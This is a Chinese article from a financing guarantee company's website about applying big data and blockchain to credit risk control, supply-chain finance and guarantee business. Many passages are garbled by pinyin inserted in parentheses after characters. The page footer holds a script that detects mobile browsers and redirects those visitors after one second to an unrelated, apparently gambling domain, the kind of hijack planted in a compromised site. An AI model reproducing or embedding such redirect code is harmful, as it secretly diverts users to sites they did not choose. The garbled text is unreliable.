一是将用户行(xing)为数据纳(na)入到风(feng)控数据体系中。风控模型中最好的数据还是金融数据,例如年龄、收入、职业、学历、资产、负债等信用数据,这些数据同信用相关度高,可以反映用户的还款能力和还款意愿,是信用风险评估最好的数据。但是除了这些强相关的数据,一些用户行为数据对信用风险评估也具有较大的影响,例如用户是否经常去澳门赌博,用户是否经常刻意隐藏自己,用户是否参与高利贷,用户是否具有吸毒倾向,是否患有重大心理疾病等,这些信息在一定概率下决定了用户风险水平。从实际发生的风险事件显示,这些小概率风险事件会导致很严重的后果,同信用风险事件的发生具有较强的关联性。前述用户行为信息,很大程度是大数据采集和分析的结果,用户一般不会提供给金融行业。前述用户行为信息中很多是规律性信息,需要大数据分析才有可能得到,其在信用评估中的权重,也需要不断地优化模型去完善。

二是丰富数据输入纬度以及较细的颗粒度,补充传统风控。传统风控模型已经不能适应复杂的现代风险管理环境,特别在数据信息录入纬度上,影响客户信用评分的信息较多,但很多信息尚未引入到风险评估流程。例如企业所处行业的竞争环境以及同业产品的竞争、企业产品的生命周期、企业的关联交易信息和司法信息、贷款个人的心理和性格、上下游产业经营情况、市场需求变化、客户对企业产品的评价等。大数据风控可以提供全面的数据(数据的广度), 强相关数据(数据的深度),实效性数据(数据的鲜活度)。这些数据颗粒度可以很小,同内部数据以及原有数据打通和整合之后,会影响风险评估结果,提升信用风险管理水平,客观地反映用户风险水平。信用风险管理中还款意愿也较为重要,多维度、全量的用户行为数据可以客观揭示用户的还款意愿,另外细小的颗粒度信息在打通之后,可以更加客观了解客户的还款能力。全量数据加用户行为分析,可以充分了解客户行为,帮助金融企业识别出恶意欺诈客户。这些多纬度、细颗粒度、全面的信息正是大数据风控的优势所在,同时也是传统风控的一个很好的补充。

三是实时输入和实时计算,解决风险视图实效性问题。传统风控的一个重要缺点是数据录入和评估结果的滞后性,导致风控模型反映的是滞后数据的结果,产生的结构性风险较大。大数据的数据采集和计算能力,可以帮助金融企业建立实时的风险管理视图。借助全面多纬度的数据、自我学习能力强的风控模型、实时计算结果,金融企业可以提升量化风险评估能力。数据、技术、模型、分析成为信用风险评估的四个关键元素,其背后的力量就是大数据的技术和分析能力。利用大数据的风控能力,实时输出风险因子信息,为金融企业提供实时风险管理视图,提高风险管理的及时性。

3.优化决策

从金(jin)融大数(shu)据(ju)使用的(de)(de)(de)实际(ji)来看,金(jin)融数(shu)据(ju)来源(yuan)于信息系(xi)统,是业(ye)务(wu)经营(ying)(ying)管(guan)(guan)(guan)理(li)行为的(de)(de)(de)信息化反映(ying)。在金(jin)融行业(ye)不断完善(shan)信息系(xi)统建设、有效(xiao)支撑企(qi)业(ye)经营(ying)(ying)管(guan)(guan)(guan)理(li)和业(ye)务(wu)发展(zhan)的(de)(de)(de)进程(cheng)中,信息系(xi)统所产生的(de)(de)(de)数(shu)据(ju)内(nei)容同(tong)步(bu)反映(ying)了企(qi)业(ye)收集(ji)、整理(li)、生产、处理(li)、分析各类经营(ying)(ying)管(guan)(guan)(guan)理(li)信息,有效(xiao)管(guan)(guan)(guan)控(kong)各类业(ye)务(wu)经营(ying)(ying)活动的(de)(de)(de)整体过程(cheng)。

传统的决策系统是单一线性、决策范围相对狭隘,区域、业务板块、部门之间都具有较大的局限性,决策结果相对片面,缺乏大局观和各个部门的配合。大数据的决策则是打破了区域间、业务板块间、部门间的局限,形成一个非线性、面向多样、自下而上的新型决策系统。这样的决策系统使得区域、业务板块之间更加具有穿透性,而决策的依据更加多样、更加客观,使得企业的决策更加安全准确。

4. 创(chuang)新业(ye)务

通过(guo)对大数据的应用(yong),可以改善(shan)金(jin)(jin)融(rong)机构与客(ke)户(hu)之间的交互、增(zeng)加用(yong)户(hu)粘性,增(zeng)强金(jin)(jin)融(rong)企业(ye)(ye)业(ye)(ye)务(wu)核心竞争力。此外,通过(guo)高端数据分(fen)析和综合(he)化数据分(fen)享,有效对接银行、保险、信托(tuo)、基金(jin)(jin)等各类金(jin)(jin)融(rong)产(chan)品,使金(jin)(jin)融(rong)企业(ye)(ye)能够从其(qi)他领(ling)域借(jie)鉴并创(chuang)造出新的金(jin)(jin)融(rong)产(chan)品。

(四)区(qu)块链(lian)技术推动供应链(lian)金(jin)融业务发(fa)展(zhan)

大数据除在前(qian)述传统金(jin)融领域得(de)到广(guang)泛运(yun)用外,借助区块链的快(kuai)速发展,近年来,供应链金(jin)融业务也得(de)以快(kuai)速发展。

1.供应链金融(rong)概(gai)述

供应链管理是指对由供应商、制造商、分销商、零售商到客户所构成网络中的物流、商流、信息流和资金流(合称“四流”)进行计划、操作和优化。供应链金融将供应链上的核心企业及其相关的上下游配套企业作为一个整体,以产业链为依托、以交易环节为重点、以资金调配为主线、以风险管理为保证、以实现共赢为目标,为整条供应链提供融资等整体金融解决方案。与传统的贸易融资业务(如信用证相比,供应链金融在真实的贸易背景下降低了对银行作为信用中介的需求,从而衍生出保理、融资租赁等模式。金融服务的提供也同时摒弃了以商业银行为单一主体的模式,拓展到以核心企业、物流企业、产业互联网平台等企业为主要组织者。供应链金融业务也因此由简单的贸易融资产品变成一种面向供应链所有成员的系统性财务安排。

2.供应链(lian)金融痛点

供应链金融主要是由供应链上下游的全量业务数据驱动进行风险评估。主要的风险点在于:一是信息不对称风险。供应链运行过程中,各类信息分散保存在各个环节中,各个参与主体难以了解交易事项最新进展,信息的不对称导致整个供应链信用体系难以建立,金融机构往往会出于风控的考虑而较为谨慎。二是贸易背景真实性问题。商业银行是以实体经济中供应链上交易方的真实交易关系为基础,利用交易过程中产生的应收账款、预付账款、存货为抵/质押,为供应链上下游企业提供融资服务。融资过程中,一旦交易的真实性不存在,金融机构将面临巨大的风险。三是业务操作风险。供应链金融中专业化的操作环节流程安排,以及独立的第三方监管引入等方式,构筑了独立于企业信用风险的第一还款来源。但这无疑对操作环节的严密性和规范性提出了很高的要求,容易出现操作性风险。因此,操作制度的完善性、操作环节的严密性和操作要求的执行力度将直接关系到第一还款来源的效力,进而决定信用风险能否被有效屏蔽。

3.区块链技(ji)术推动供(gong)应链金融(rong)发展

区块链是由分布式账本技术、点对点技术、非对称加密技术、智能合约技术、共识机制等一系列现有成熟技术的有机组合,它对账本进行分布式的有效记录,并且提供完善的脚本以支持不同的业务逻辑,在典型的区块链系统中,数据以区块(block)为单位产生和存储,并按照时间顺序连成链式(chain)数据结构。所有节点共同参与区块链系统的数据验证、存储和维护,新区块的创建通常需得到全网多数支持(数量取决于不同的共识机制节点的确认,并向各节点广播,实现全网同步,之后不能更改或删除)。区块链系统应具备如下特征:一是多方写入,共同维护区块链的记账参与方应当由多个利益不完全一致的实体组成,在不同的记账周期内,由不同的参与方主导发起记账,其他的参与方将对主导方发起的记账信息进行共同验证。二是公开账本。区块链系统记录的账本应处于所有参与者被允许访问的状态,记账参与者必须有能力访问信息内容和账本的历史情况,但是公开账本指的是可访问性的公开,并不代表信息本身的公开,因此,业界期望将隐私保护方面的技术应用到区块链领域,以解决通过密文操作就能验证信息有效性的问题。三是去中心化。在有众多节点的系统中,每个节点都具有高度自治的特征。节点之间彼此可以自由连接,形成新的连接单元。任何一个节点都可能成为阶段性的中心,但不具备强制性的中心控制功能。节点与节点之间的影响,会通过网络而形成非线性因果关系。四是不可篡改性。区块链的不可篡改是基于密码学的散列算法,以及多方共同维护的特性,但同时由于这个特性,区块链的不可篡改并不是严格意义上的,称之为难以篡改更为合适。

4.供应链金(jin)融案例(li)

2017年6月,浙(zhe)商银行与趣链(lian)(lian)科技(ji)(ji)合作搭建的(de)(de)基于区(qu)(qu)块链(lian)(lian)技(ji)(ji)术(shu)的(de)(de)“应(ying)收款链(lian)(lian)平台”正式(shi)上线运(yun)营,平台用于办理(li)企(qi)(qi)业(ye)应(ying)收账(zhang)款的(de)(de)签发、承兑(dui)保兑(dui)、支付(fu)、转(zhuan)让(rang)、质押、兑(dui)付(fu)等业(ye)务,实现了将传统的(de)(de)保理(li)业(ye)务移植到区(qu)(qu)块链(lian)(lian)上,让(rang)企(qi)(qi)业(ye)能够(gou)更加(jia)高效的(de)(de)运(yun)用应(ying)收账(zhang)款融(rong)资(zi),平台提供(gong)单一企(qi)(qi)业(ye)、产业(ye)联盟、区(qu)(qu)域(yu)联姻等多种(zhong)合作模式(shi),助(zhu)力企(qi)(qi)业(ye)构建供(gong)应(ying)链(lian)(lian)商圈,其核心(xin)是将应(ying)收账(zhang)款转(zhuan)化为电子(zi)支付(fu)结(jie)算和融(rong)资(zi)工具,以达到盘活流动资(zi)产,加(jia)快资(zi)金周转(zhuan),减少融(rong)资(zi)成(cheng)本(ben)以达到帮助(zhu)企(qi)(qi)业(ye)降(jiang)本(ben)增(zeng)效和助(zhu)力小微企(qi)(qi)业(ye)融(rong)资(zi)的(de)(de)目的(de)(de)。

平(ping)台(tai)(tai)上(shang)(shang)线后平(ping)稳(wen)运营,2017年(nian)8月初在(zai)平(ping)台(tai)(tai)上(shang)(shang)运行(xing)(xing)(xing)了首单业(ye)(ye)(ye)务(wu),实现了在(zai)线签发(fa)(fa)应(ying)(ying)(ying)(ying)(ying)收(shou)账(zhang)款(kuan)(kuan)1339万元,并进行(xing)(xing)(xing)了企(qi)(qi)业(ye)(ye)(ye)间的线上(shang)(shang)支付交(jiao)易。此后,应(ying)(ying)(ying)(ying)(ying)收(shou)款(kuan)(kuan)链(lian)平(ping)台(tai)(tai)实现平(ping)稳(wen)较快发(fa)(fa)展(zhan)。浙商(shang)(shang)银(yin)行(xing)(xing)(xing)2019年(nian)年(nian)报显(xian)示,截(jie)至2019年(nian)年(nian)末,平(ping)台(tai)(tai)落地项目(mu)2,493个,较上(shang)(shang)年(nian)末增长(zhang)76.81%,应(ying)(ying)(ying)(ying)(ying)收(shou)款(kuan)(kuan)保(bao)兑余额961.08亿元,较上(shang)(shang)年(nian)末增长(zhang)46.34%。此外,2018年(nian)8月17日,“浙商(shang)(shang)链(lian)融2018年(nian)度第一期企(qi)(qi)业(ye)(ye)(ye)应(ying)(ying)(ying)(ying)(ying)收(shou)账(zhang)款(kuan)(kuan)资产(chan)支持票据(ju)”在(zai)银(yin)行(xing)(xing)(xing)间市(shi)场(chang)发(fa)(fa)行(xing)(xing)(xing),该产(chan)品(pin)发(fa)(fa)行(xing)(xing)(xing)金额4.57亿元,发(fa)(fa)行(xing)(xing)(xing)期限354天,债项信(xin)用等级为AAA;产(chan)品(pin)以(yi)企(qi)(qi)业(ye)(ye)(ye)在(zai)浙商(shang)(shang)银(yin)行(xing)(xing)(xing)应(ying)(ying)(ying)(ying)(ying)收(shou)款(kuan)(kuan)链(lian)平(ping)台(tai)(tai)上(shang)(shang)签发(fa)(fa)及(ji)承兑的应(ying)(ying)(ying)(ying)(ying)收(shou)账(zhang)款(kuan)(kuan)为基(ji)础(chu)资产(chan)。这(zhei)是银(yin)行(xing)(xing)(xing)间市(shi)场(chang)首单应(ying)(ying)(ying)(ying)(ying)用区(qu)块链(lian)技术、直接(jie)以(yi)企(qi)(qi)业(ye)(ye)(ye)应(ying)(ying)(ying)(ying)(ying)收(shou)账(zhang)款(kuan)(kuan)为基(ji)础(chu)资产(chan)的证券化(hua)产(chan)品(pin)。

(五)大数据金(jin)融面临的挑(tiao)战

1.金融行业的数据(ju)资产(chan)管理(li)应用水平仍待提高

金融行业的数据资产管理仍存在数据质量不足、数据获取方式单一、数据系统分散等问题。一是金融数据质量不足,主要体现为数据缺失、数据重复、数据错误和数据格式不统一等方面。二是金融行业数据来源相对单一,对于外部数据的引入和应用仍需加强。三是金融行业的数据标准化程度低,分散在多个数据系统中,现有的数据采集和应用能力难以满足当前大规模的数据分析要求,数据应用需求的响应速度仍不足。

2.金融大数据应用技术与(yu)业务探索仍需突(tu)破(po)

金(jin)融行业(ye)的(de)大数(shu)据(ju)分(fen)(fen)析应用(yong)(yong)模型仍处于探索阶段,成(cheng)熟案(an)例和(he)(he)解(jie)决方案(an)相对较少(shao),金(jin)融机构应用(yong)(yong)大数(shu)据(ju)需(xu)要(yao)(yao)投入大量的(de)时(shi)间和(he)(he)成(cheng)本进行调研和(he)(he)尝试(shi),一(yi)定(ding)程度上制约了(le)金(jin)融机构大数(shu)据(ju)应用(yong)(yong)的(de)积极性。此外(wai),目前的(de)应用(yong)(yong)实践反映(ying)出大数(shu)据(ju)分(fen)(fen)析的(de)误判(pan)率还比较高(gao),机器(qi)判(pan)断(duan)后的(de)结果仍需(xu)要(yao)(yao)人工(gong)核(he)查,资源利用(yong)(yong)效(xiao)率和(he)(he)客户(hu)体验(yan)均有待提升。

3.金(jin)融大数(shu)据的(de)行业标(biao)准与安全(quan)规范(fan)仍待完(wan)善(shan)

当前(qian),金(jin)融大(da)数(shu)(shu)据(ju)(ju)的(de)(de)(de)相(xiang)关标(biao)准仍处于(yu)探索期(qi),金(jin)融大(da)数(shu)(shu)据(ju)(ju)缺乏(fa)统一的(de)(de)(de)存储管(guan)理标(biao)准和互通共享平台,涉及金(jin)融行业(ye)(ye)(ye)大(da)数(shu)(shu)据(ju)(ju)的(de)(de)(de)安全(quan)(quan)规范(fan)(fan)还存在较(jiao)多(duo)空白。相(xiang)对于(yu)其(qi)他行业(ye)(ye)(ye),金(jin)融大(da)数(shu)(shu)据(ju)(ju)涉及更(geng)多(duo)的(de)(de)(de)用户个(ge)人隐私,在用户数(shu)(shu)据(ju)(ju)安全(quan)(quan)和信息(xi)保护方面要求更(geng)加严格。大(da)数(shu)(shu)据(ju)(ju)在多(duo)个(ge)金(jin)融行业(ye)(ye)(ye)细(xi)分领域的(de)(de)(de)应用,在缺乏(fa)行业(ye)(ye)(ye)统一安全(quan)(quan)标(biao)准和规范(fan)(fan)的(de)(de)(de)情况(kuang)下,单纯依靠金(jin)融机构(gou)自(zi)身(shen)管(guan)控,会带(dai)来较(jiao)大(da)的(de)(de)(de)安全(quan)(quan)风(feng)险。

4.金融大数据发展的顶层设计和扶持政(zheng)策还需强化

在发展规划方面,金融大数据发展的顶层设计仍需强化。一方面,金融机构间的数据壁垒仍较为明显,数据应用仍是各自为战,缺乏有效的整合协同,跨领域和跨企业的数据应用相对较少。另一方面,金融行业数据应用缺乏整体性规划,当前仍存在较多分散性、临时性和应激性的数据应用,数据资产的应用价值没有得到充分发挥,业务支撑作用仍待加强,需要通过行业整体性的产业规划和扶持政策,明确发展点,加强方向引导。 

(六(liu))大数据金融行(xing)业发展趋势

1.大数(shu)据应用(yong)水平将成为金融企业(ye)竞争力的核心要素

在国内,金融机构对大数据的认知已经从探索阶段进入到认同阶段。金融行业对大数据的需求属于业务驱动型,其迫切希望应用大数据技术使营销更精准、风险识别更准确、经营决策更具针对性,产品更具吸引力,从而降低企业成本,提高企业利润。随着更多金融机构基于大数据获得丰厚的回报,将进一步打消顾虑,加速大数据的普及。

2.金融行(xing)业数据整合、共享和开放成为(wei)趋势

数据越关联越有价值,越开放越有价值。全球范围内掀起一轮数据开放的热潮,国务院《促进大数据发展行动纲要》提出要在中央政府层面实现金税、金关、金财、金审、金土、金农等信息系统通过统一平台进行数据共享和交换。

3.金(jin)融(rong)数(shu)据与其他领域数(shu)据的融(rong)合应用不断强(qiang)化

2015年以前,金融机构主要基于自有信息进行分析。2016年开始,随着大数据技术日益成熟,金融机构得以通过客户动态数据的获取更深入地了解客户。未来,数据流通的市场更加健全,金融机构将可以方便地获取电信、电商、医疗、出行等其他行业的数据,一方面会有力地促进金融数据和其他行业数据融合,使得金融机构的管销和风控模型更加精准。另一方面,跨行业数据融合会催生出跨行业的应用,使金融行业得以设计出更多的基于场景的金融产品,与其他行业进行更深入的融合。

4.人工智能正(zheng)在(zai)成为金(jin)融大(da)数据(ju)应用的新方向

新型技(ji)术(shu)的(de)快(kuai)(kuai)速(su)发(fa)(fa)展(zhan),加(jia)快(kuai)(kuai)大(da)(da)数(shu)(shu)据(ju)和(he)人(ren)(ren)工(gong)智(zhi)(zhi)能(neng)(neng)(neng)技(ji)术(shu)的(de)快(kuai)(kuai)速(su)融(rong)合。大(da)(da)数(shu)(shu)据(ju)技(ji)术(shu)强(qiang)调数(shu)(shu)据(ju)的(de)采集、储存、处理(li)(li)(li)和(he)展(zhan)现(xian)(xian)。人(ren)(ren)工(gong)智(zhi)(zhi)能(neng)(neng)(neng)可(ke)(ke)以(yi)在(zai)各(ge)个(ge)阶段助力大(da)(da)数(shu)(shu)据(ju)发(fa)(fa)挥更大(da)(da)的(de)作用。在(zai)采集上,图像识(shi)别、语音识(shi)别、语义理(li)(li)(li)解等人(ren)(ren)工(gong)智(zhi)(zhi)能(neng)(neng)(neng)认知技(ji)术(shu)实现(xian)(xian)海量非结构化数(shu)(shu)据(ju)采集,在(zai)数(shu)(shu)据(ju)的(de)储存和(he)管理(li)(li)(li)上,人(ren)(ren)工(gong)智(zhi)(zhi)能(neng)(neng)(neng)技(ji)术(shu)可(ke)(ke)以(yi)自(zi)动为数(shu)(shu)据(ju)打标签(qian),自(zi)动将(jiang)数(shu)(shu)据(ju)归(gui)类。在(zai)数(shu)(shu)据(ju)处理(li)(li)(li)上,人(ren)(ren)工(gong)智(zhi)(zhi)能(neng)(neng)(neng)、深度(du)学(xue)习、机器(qi)学(xue)习、知识(shi)图谱(pu)技(ji)术(shu)可(ke)(ke)以(yi)提高算(suan)法模型的(de)数(shu)(shu)据(ju)处理(li)(li)(li)的(de)效(xiao)率和(he)准确度(du),数(shu)(shu)据(ju)展(zhan)现(xian)(xian)上,智(zhi)(zhi)能(neng)(neng)(neng)可(ke)(ke)视(shi)化技(ji)术(shu)可(ke)(ke)以(yi)实现(xian)(xian)数(shu)(shu)据(ju)实时监控(kong)和(he)可(ke)(ke)视(shi)化呈现(xian)(xian)。大(da)(da)数(shu)(shu)据(ju)与(yu)人(ren)(ren)工(gong)智(zhi)(zhi)能(neng)(neng)(neng)正在(zai)进行多维度(du)的(de)深度(du)融(rong)合,拓展(zhan)了金融(rong)大(da)(da)数(shu)(shu)据(ju)的(de)应用价值和(he)应用场景(jing)。

5.金融数(shu)据安全问题越(yue)来越(yue)受到重视

大数(shu)(shu)(shu)(shu)据(ju)(ju)使(shi)得金融机构海量的(de)高价值(zhi)数(shu)(shu)(shu)(shu)据(ju)(ju)得到集中(zhong),并使(shi)数(shu)(shu)(shu)(shu)据(ju)(ju)实现(xian)快(kuai)速存取。但是,如果出现(xian)信息泄(xie)露(lu)可能(neng)一次性泄(xie)露(lu)全部的(de)数(shu)(shu)(shu)(shu)据(ju)(ju)资产(chan)。数(shu)(shu)(shu)(shu)据(ju)(ju)泄(xie)露(lu)后还可能(neng)急速扩散,甚至出现(xian)更加严重的(de)数(shu)(shu)(shu)(shu)据(ju)(ju)篡改(gai)和智(zhi)能(neng)欺诈的(de)情况。


四、融资担保公(gong)司大数据产业发展思(si)路

(一(yi))总体思路

目前,较之银行、券商等金融机构,多数融资担保公司尚未建立信息化体系,基于大数据技术的业务模式和风控模型尚不成熟。在此背景下,融资担保公司应加快大数据基础的建设,具体来看,一是加快融资担保公司自身信息化的建设步伐,与高资质软件开发企业合作,开发符合自身业务实际需要的信息化系统,实现业务全流程线上化、可视化,优化公司经营管理效率。二是丰富融资担保公司自身大数据,深入挖掘自身业务积累的数据,积极拓展外部优质数据源,推动公司整体数据金融化进度。三是加快融资担保公司大数据风控体系的建设,逐步将大数据应用于融资担保业务开展的具体场景中,推动融资担保公司业务开展的同时降低业务风险。

(二(er))大数据对融(rong)资担保公司业务的(de)推动路径

1.优化公司管理流(liu)程

依托融资担保公司信息化和大数据系统,有效提升融资担保公司的经营管理效能:一是依托信息化系统,推动业务全程线上化,优化业务流程,提升业务、风控的决策效率。二是依托可视化的业务系统,实时监控业务流程,及时发现业务开展过程中的瓶颈问题,及时予以解决;同时,定期对业务数据进行全面分析,提高公司经营管理效能。三是依托外部数据,为寻找新的业务方向、明确融资担保公司未来转型发展思路提供智力支持。四是在金融监管日益趋严的背景下,开展舆情监控,及时了解发现不利于融资担保公司发展的负面信息,提升公司整体合规性发展。

2.加快大数据在融资担保公司业务中的应用

一是实现精准营销,提升业务拓展力度。依托大数据模型下的客户画像,及时发现潜在客户,精准定位客户需求,通过向客户提供针对性业务产品,拓展业务渠道,获取优质客户。二是依托大数据技术做好存量客户管理。深入挖掘存量客户交易信息、服务反馈等数据信息,及时发现存量客户尚未满足的需要和对现有服务的不满,及时采取恰当行动对存量客户进行挽留,减少客户流失。三是实现客户生命周期管理。通过对存量客户的跟踪,及时识别客户新的需求,通过差异化业务产品的精准匹配,实现对客户全生命周期的服务匹配。

3.加快大(da)数(shu)据(ju)风(feng)控体系的建设

大数据风控模型主要影响在于:一是推动风控思想的改变。担保行业传统风控思想以控制单一项目风险为主,大数据风控下,尤其是针对中小微企业客户,根据其小额分散的特点,参照保险行业精算理论,运用大数法则对批量业务的风险进行建模和分析,从中找到风险发生的规律,并在一定假设条件下对未来风险发生的可能和造成的风险大小进行预判,实现通过收益覆盖风险的业务逻辑。

二是实现全程动态风控体系。融资担保公司现有的风控体系主要基于现场尽调过程中收集的客户的历史数据和财务报表等数字化数据。但依托大数据风控体系,则能够在其风险管理系统中接入海量集中式数据,通过多维度、多种类数据的交叉验证,解决客户信用风险评估中客户信息难以全面收集的问题,从而有效地缓解业务中所面临的信息不对称的问题,提高了对客户信用风险的识别和预防能力。此外,数据技术的利用,将提升融资担保公司保后管理能力,尤其是非现场的保后管理能力。在大数据技术的应用下,融资担保公司的风险控制将以非现场的预警监测为依托,对不同客户群的风险特征和行为模式进行识别,强调对授信客户进行持续跟踪、动态监测和实时预警。


文章作(zuo)者:战略研究部(bu)——孙坚

0
诚聘英才

官方微(wei)信公众号

联系我们

027-87317028

027-87319263-8209

湖北省武汉市武昌区
洪山路64号湖光大厦东7楼

武汉市武昌区杏林西(xi)路6号(hao)2层

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();